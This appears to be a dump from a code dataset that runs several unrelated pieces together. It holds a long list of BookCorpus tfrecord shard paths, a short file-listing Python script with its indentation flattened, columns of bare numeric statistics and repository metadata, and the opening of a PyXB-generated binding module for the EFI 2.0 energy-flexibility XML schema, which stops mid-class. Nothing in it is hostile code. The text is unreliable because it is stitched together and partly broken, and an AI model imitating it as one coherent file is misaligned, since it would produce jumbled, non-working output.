/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00088 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00089 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00090 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00091 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00092 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00093 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00094 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00095 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00096 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00097 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00098 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00099 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000100 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000101 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000102 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000103 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000104 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000105 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000106 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000107 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000108 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000109 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000110 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000111 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000112 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000113 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000114 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000115 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000116 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000117 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000118 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000119 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000120 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000121 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000122 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000123 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000124 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000125 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000126 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000127 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000128 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000129 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000130 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000131 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000132 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000133 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000134 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000135 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000136 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000137 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000138 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000139 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000140 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000141 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000142 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000143 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000144 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000145 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000146 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000147 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000148 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000149 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000150 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000151 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000152 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000153 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000154 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000155 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000156 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000157 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000158 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000159 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000160 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000161 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000162 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000163 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000164
import os
from natsort import natsorted
location='/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded'
files = []
for fn in natsorted(os.listdir(location)):
if 'tfrecord' in fn:
files.append(location+'/'+fn)
print(' '.join(files))
| 855.117647
| 14,246
| 0.903281
| 1,689
| 14,537
| 7.480166
| 0.115453
| 0.15767
| 0.289061
| 0.407314
| 0.813836
| 0.813836
| 0.813836
| 0.80972
| 0.80972
| 0
| 0
| 0.061418
| 0.014377
| 14,537
| 16
| 14,247
| 908.5625
| 0.820352
| 0.981977
| 0
| 0
| 0
| 0
| 0.267442
| 0.228682
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.125
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c6440e1ff0ccfa608884f09f3edbb4df6bf50163
| 502,222
|
py
|
Python
|
universal-dimmer-python/service/model/InflexibleControllerEfi20/xsd.py
|
flexiblepower/defpi-tutorial
|
59b57290444cf01ee4094bfac00c061c9474882a
|
[
"Apache-2.0"
] | 1
|
2021-04-13T00:34:35.000Z
|
2021-04-13T00:34:35.000Z
|
universal-dimmer-python/service/model/InflexibleControllerEfi20/xsd.py
|
flexiblepower/defpi-tutorial
|
59b57290444cf01ee4094bfac00c061c9474882a
|
[
"Apache-2.0"
] | 1
|
2018-10-01T13:21:50.000Z
|
2018-10-06T08:14:01.000Z
|
universal-dimmer-python/service/model/InflexibleControllerEfi20/xsd.py
|
flexiblepower/defpi-tutorial
|
59b57290444cf01ee4094bfac00c061c9474882a
|
[
"Apache-2.0"
] | 3
|
2020-02-16T11:46:40.000Z
|
2021-06-15T12:56:13.000Z
|
# service/model/InflexibleControllerEfi20/xsd.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:b550fb16b19cc058aca9062a23ea1ae456ced48d
# Generated 2018-08-10 09:57:06.989505 by PyXB version 1.2.6 using Python 3.6.6.final.0
# Namespace http://www.flexiblepower.org/efi-2
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:bd54841e-9c83-11e8-9b68-0242ac110004')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://www.flexiblepower.org/efi-2', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://www.flexiblepower.org/efi-2}InstructionStatus
class InstructionStatus (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'InstructionStatus')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 87, 1)
_Documentation = None
InstructionStatus._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=InstructionStatus, enum_prefix=None)
InstructionStatus.ACCEPTED = InstructionStatus._CF_enumeration.addEnumeration(unicode_value='ACCEPTED', tag='ACCEPTED')
InstructionStatus.STARTED = InstructionStatus._CF_enumeration.addEnumeration(unicode_value='STARTED', tag='STARTED')
InstructionStatus.SUCCEEDED = InstructionStatus._CF_enumeration.addEnumeration(unicode_value='SUCCEEDED', tag='SUCCEEDED')
InstructionStatus.REJECTED = InstructionStatus._CF_enumeration.addEnumeration(unicode_value='REJECTED', tag='REJECTED')
InstructionStatus.ABORTED = InstructionStatus._CF_enumeration.addEnumeration(unicode_value='ABORTED', tag='ABORTED')
InstructionStatus._InitializeFacetMap(InstructionStatus._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'InstructionStatus', InstructionStatus)
_module_typeBindings.InstructionStatus = InstructionStatus
# Atomic simple type: {http://www.flexiblepower.org/efi-2}CommodityEnum
class CommodityEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CommodityEnum')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 114, 1)
_Documentation = None
CommodityEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CommodityEnum, enum_prefix=None)
CommodityEnum.ELECTRICITY = CommodityEnum._CF_enumeration.addEnumeration(unicode_value='ELECTRICITY', tag='ELECTRICITY')
CommodityEnum.GAS = CommodityEnum._CF_enumeration.addEnumeration(unicode_value='GAS', tag='GAS')
CommodityEnum.HEAT = CommodityEnum._CF_enumeration.addEnumeration(unicode_value='HEAT', tag='HEAT')
CommodityEnum._InitializeFacetMap(CommodityEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CommodityEnum', CommodityEnum)
_module_typeBindings.CommodityEnum = CommodityEnum
# Atomic simple type: {http://www.flexiblepower.org/efi-2}CurtailmentQuantity
class CurtailmentQuantity (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentQuantity')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 121, 1)
_Documentation = None
CurtailmentQuantity._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CurtailmentQuantity, enum_prefix=None)
CurtailmentQuantity.ELECTRICITY_POWER = CurtailmentQuantity._CF_enumeration.addEnumeration(unicode_value='ELECTRICITY.POWER', tag='ELECTRICITY_POWER')
CurtailmentQuantity.GAS_FLOWRATE = CurtailmentQuantity._CF_enumeration.addEnumeration(unicode_value='GAS.FLOWRATE', tag='GAS_FLOWRATE')
CurtailmentQuantity.HEAT_TEMPERATURE = CurtailmentQuantity._CF_enumeration.addEnumeration(unicode_value='HEAT.TEMPERATURE', tag='HEAT_TEMPERATURE')
CurtailmentQuantity.HEAT_FLOWRATE = CurtailmentQuantity._CF_enumeration.addEnumeration(unicode_value='HEAT.FLOWRATE', tag='HEAT_FLOWRATE')
CurtailmentQuantity.HEAT_THERMALPOWER = CurtailmentQuantity._CF_enumeration.addEnumeration(unicode_value='HEAT.THERMALPOWER', tag='HEAT_THERMALPOWER')
CurtailmentQuantity._InitializeFacetMap(CurtailmentQuantity._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CurtailmentQuantity', CurtailmentQuantity)
_module_typeBindings.CurtailmentQuantity = CurtailmentQuantity
# Atomic simple type: {http://www.flexiblepower.org/efi-2}CurrencyType
class CurrencyType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurrencyType')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 469, 1)
_Documentation = None
CurrencyType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CurrencyType, enum_prefix=None)
CurrencyType.AED = CurrencyType._CF_enumeration.addEnumeration(unicode_value='AED', tag='AED')
CurrencyType.ANG = CurrencyType._CF_enumeration.addEnumeration(unicode_value='ANG', tag='ANG')
CurrencyType.AUD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='AUD', tag='AUD')
CurrencyType.CHE = CurrencyType._CF_enumeration.addEnumeration(unicode_value='CHE', tag='CHE')
CurrencyType.CHF = CurrencyType._CF_enumeration.addEnumeration(unicode_value='CHF', tag='CHF')
CurrencyType.CHW = CurrencyType._CF_enumeration.addEnumeration(unicode_value='CHW', tag='CHW')
CurrencyType.EUR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='EUR', tag='EUR')
CurrencyType.GBP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='GBP', tag='GBP')
CurrencyType.LBP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='LBP', tag='LBP')
CurrencyType.LKR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='LKR', tag='LKR')
CurrencyType.LRD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='LRD', tag='LRD')
CurrencyType.LSL = CurrencyType._CF_enumeration.addEnumeration(unicode_value='LSL', tag='LSL')
CurrencyType.LYD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='LYD', tag='LYD')
CurrencyType.MAD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MAD', tag='MAD')
CurrencyType.MDL = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MDL', tag='MDL')
CurrencyType.MGA = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MGA', tag='MGA')
CurrencyType.MKD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MKD', tag='MKD')
CurrencyType.MMK = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MMK', tag='MMK')
CurrencyType.MNT = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MNT', tag='MNT')
CurrencyType.MOP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MOP', tag='MOP')
CurrencyType.MRO = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MRO', tag='MRO')
CurrencyType.MUR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MUR', tag='MUR')
CurrencyType.MVR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MVR', tag='MVR')
CurrencyType.MWK = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MWK', tag='MWK')
CurrencyType.MXN = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MXN', tag='MXN')
CurrencyType.MXV = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MXV', tag='MXV')
CurrencyType.MYR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MYR', tag='MYR')
CurrencyType.MZN = CurrencyType._CF_enumeration.addEnumeration(unicode_value='MZN', tag='MZN')
CurrencyType.NAD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='NAD', tag='NAD')
CurrencyType.NGN = CurrencyType._CF_enumeration.addEnumeration(unicode_value='NGN', tag='NGN')
CurrencyType.NIO = CurrencyType._CF_enumeration.addEnumeration(unicode_value='NIO', tag='NIO')
CurrencyType.NOK = CurrencyType._CF_enumeration.addEnumeration(unicode_value='NOK', tag='NOK')
CurrencyType.NPR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='NPR', tag='NPR')
CurrencyType.NZD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='NZD', tag='NZD')
CurrencyType.OMR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='OMR', tag='OMR')
CurrencyType.PAB = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PAB', tag='PAB')
CurrencyType.PEN = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PEN', tag='PEN')
CurrencyType.PGK = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PGK', tag='PGK')
CurrencyType.PHP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PHP', tag='PHP')
CurrencyType.PKR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PKR', tag='PKR')
CurrencyType.PLN = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PLN', tag='PLN')
CurrencyType.PYG = CurrencyType._CF_enumeration.addEnumeration(unicode_value='PYG', tag='PYG')
CurrencyType.QAR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='QAR', tag='QAR')
CurrencyType.RON = CurrencyType._CF_enumeration.addEnumeration(unicode_value='RON', tag='RON')
CurrencyType.RSD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='RSD', tag='RSD')
CurrencyType.RUB = CurrencyType._CF_enumeration.addEnumeration(unicode_value='RUB', tag='RUB')
CurrencyType.RWF = CurrencyType._CF_enumeration.addEnumeration(unicode_value='RWF', tag='RWF')
CurrencyType.SAR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SAR', tag='SAR')
CurrencyType.SBD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SBD', tag='SBD')
CurrencyType.SCR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SCR', tag='SCR')
CurrencyType.SDG = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SDG', tag='SDG')
CurrencyType.SEK = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SEK', tag='SEK')
CurrencyType.SGD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SGD', tag='SGD')
CurrencyType.SHP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SHP', tag='SHP')
CurrencyType.SLL = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SLL', tag='SLL')
CurrencyType.SOS = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SOS', tag='SOS')
CurrencyType.SRD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SRD', tag='SRD')
CurrencyType.SSP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SSP', tag='SSP')
CurrencyType.STD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='STD', tag='STD')
CurrencyType.SYP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SYP', tag='SYP')
CurrencyType.SZL = CurrencyType._CF_enumeration.addEnumeration(unicode_value='SZL', tag='SZL')
CurrencyType.THB = CurrencyType._CF_enumeration.addEnumeration(unicode_value='THB', tag='THB')
CurrencyType.TJS = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TJS', tag='TJS')
CurrencyType.TMT = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TMT', tag='TMT')
CurrencyType.TND = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TND', tag='TND')
CurrencyType.TOP = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TOP', tag='TOP')
CurrencyType.TRY = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TRY', tag='TRY')
CurrencyType.TTD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TTD', tag='TTD')
CurrencyType.TWD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TWD', tag='TWD')
CurrencyType.TZS = CurrencyType._CF_enumeration.addEnumeration(unicode_value='TZS', tag='TZS')
CurrencyType.UAH = CurrencyType._CF_enumeration.addEnumeration(unicode_value='UAH', tag='UAH')
CurrencyType.UGX = CurrencyType._CF_enumeration.addEnumeration(unicode_value='UGX', tag='UGX')
CurrencyType.USD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='USD', tag='USD')
CurrencyType.USN = CurrencyType._CF_enumeration.addEnumeration(unicode_value='USN', tag='USN')
CurrencyType.UYI = CurrencyType._CF_enumeration.addEnumeration(unicode_value='UYI', tag='UYI')
CurrencyType.UYU = CurrencyType._CF_enumeration.addEnumeration(unicode_value='UYU', tag='UYU')
CurrencyType.UZS = CurrencyType._CF_enumeration.addEnumeration(unicode_value='UZS', tag='UZS')
CurrencyType.VEF = CurrencyType._CF_enumeration.addEnumeration(unicode_value='VEF', tag='VEF')
CurrencyType.VND = CurrencyType._CF_enumeration.addEnumeration(unicode_value='VND', tag='VND')
CurrencyType.VUV = CurrencyType._CF_enumeration.addEnumeration(unicode_value='VUV', tag='VUV')
CurrencyType.WST = CurrencyType._CF_enumeration.addEnumeration(unicode_value='WST', tag='WST')
CurrencyType.XAG = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XAG', tag='XAG')
CurrencyType.XAU = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XAU', tag='XAU')
CurrencyType.XBA = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XBA', tag='XBA')
CurrencyType.XBB = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XBB', tag='XBB')
CurrencyType.XBC = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XBC', tag='XBC')
CurrencyType.XBD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XBD', tag='XBD')
CurrencyType.XCD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XCD', tag='XCD')
CurrencyType.XOF = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XOF', tag='XOF')
CurrencyType.XPD = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XPD', tag='XPD')
CurrencyType.XPF = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XPF', tag='XPF')
CurrencyType.XPT = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XPT', tag='XPT')
CurrencyType.XSU = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XSU', tag='XSU')
CurrencyType.XTS = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XTS', tag='XTS')
CurrencyType.XUA = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XUA', tag='XUA')
CurrencyType.XXX = CurrencyType._CF_enumeration.addEnumeration(unicode_value='XXX', tag='XXX')
CurrencyType.YER = CurrencyType._CF_enumeration.addEnumeration(unicode_value='YER', tag='YER')
CurrencyType.ZAR = CurrencyType._CF_enumeration.addEnumeration(unicode_value='ZAR', tag='ZAR')
CurrencyType.ZMW = CurrencyType._CF_enumeration.addEnumeration(unicode_value='ZMW', tag='ZMW')
CurrencyType.ZWL = CurrencyType._CF_enumeration.addEnumeration(unicode_value='ZWL', tag='ZWL')
CurrencyType._InitializeFacetMap(CurrencyType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CurrencyType', CurrencyType)
_module_typeBindings.CurrencyType = CurrencyType
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.double):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 712, 4)
_Documentation = None
STD_ANON._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON, value=pyxb.binding.datatypes.double(0.0))
STD_ANON._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON, value=pyxb.binding.datatypes.double(1.0))
STD_ANON._InitializeFacetMap(STD_ANON._CF_minInclusive,
STD_ANON._CF_maxInclusive)
_module_typeBindings.STD_ANON = STD_ANON
# Atomic simple type: [anonymous]
class STD_ANON_ (pyxb.binding.datatypes.double):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 786, 4)
_Documentation = None
STD_ANON_._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON_, value=pyxb.binding.datatypes.double(0.0))
STD_ANON_._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON_, value=pyxb.binding.datatypes.double(1.0))
STD_ANON_._InitializeFacetMap(STD_ANON_._CF_minInclusive,
STD_ANON_._CF_maxInclusive)
_module_typeBindings.STD_ANON_ = STD_ANON_
# Atomic simple type: [anonymous]
class STD_ANON_2 (pyxb.binding.datatypes.double):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 903, 7)
_Documentation = None
STD_ANON_2._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON_2, value=pyxb.binding.datatypes.double(0.0))
STD_ANON_2._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON_2, value=pyxb.binding.datatypes.double(1.0))
STD_ANON_2._InitializeFacetMap(STD_ANON_2._CF_minInclusive,
STD_ANON_2._CF_maxInclusive)
_module_typeBindings.STD_ANON_2 = STD_ANON_2
# Atomic simple type: [anonymous]
class STD_ANON_3 (pyxb.binding.datatypes.double):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 925, 7)
_Documentation = None
STD_ANON_3._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON_3, value=pyxb.binding.datatypes.double(0.0))
STD_ANON_3._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON_3, value=pyxb.binding.datatypes.double(1.0))
STD_ANON_3._InitializeFacetMap(STD_ANON_3._CF_minInclusive,
STD_ANON_3._CF_maxInclusive)
_module_typeBindings.STD_ANON_3 = STD_ANON_3
# Atomic simple type: {http://www.flexiblepower.org/efi-2}DeviceClass
class DeviceClass (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DeviceClass')
